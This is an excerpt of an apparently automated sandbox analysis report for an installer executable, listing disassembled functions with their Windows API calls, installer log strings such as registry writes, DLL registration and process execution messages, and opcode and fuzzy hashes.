                                                                                                                                                                                                                                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                  • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                  • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                  • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                  • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                  • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                  • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                  • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                  • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                  • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                  • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                  • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425576,755723A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                  • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                  • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                  • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                  • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                  • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425576,755723A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                    • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                    • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                  • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                  • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                  • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                  • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                  • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                  • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                  • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00071600,00000064,0014B637), ref: 00403295
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                  • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                  • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                  • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                  • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                  • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                  • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                  • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                  • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                  • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                  • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                  • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                  • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                  • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                  • String ID: !
                                                                                                                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                  • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                  • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                  • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                  • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                  • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                  APIs
